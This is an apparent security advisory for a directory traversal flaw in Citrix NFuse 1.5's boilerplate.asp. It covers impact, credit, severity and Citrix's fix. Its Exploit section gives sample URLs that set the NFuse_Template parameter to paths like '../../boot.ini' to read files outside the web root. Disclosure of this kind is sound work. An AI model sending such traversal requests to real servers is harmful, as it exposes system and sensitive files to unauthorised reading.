|
Brought to you by:
Suppliers of:
|
|
|
| |
| Citrix NFuse is an application portal that provides organizations with the ability to integrate and publish interactive applications into any standard web browser. NFuse is a three-tier solution that includes a Citrix Server component, a Web Server component, and a Citrix ICA client component with a web browser. A security vulnerability in the product allows attackers to retrieve files that reside on the remote server after they have authenticated with it (i.e. download any file that reside even outside the bounding HTML root directory). |
| |
Credit:
The information has been provided by Eric Budke.
|
| |
Vulnerable systems:
NFuse version 1.5
Given that you must be authenticated first, one assumes that you have some minimal level of trust for the end user, so the severity is not that high. However since sensitive files can be accessed, this kind of vulnerability might prove to be dangerous. Further several Internet based sites require no such authentication placing them in danger.
Solution:
According to Citrix, this issue is only in NFuse version 1.5 as the boilerplate.asp no longer exists in the most recent version.
Exploit:
A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
Or alternatively:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
|
|
|
|
|
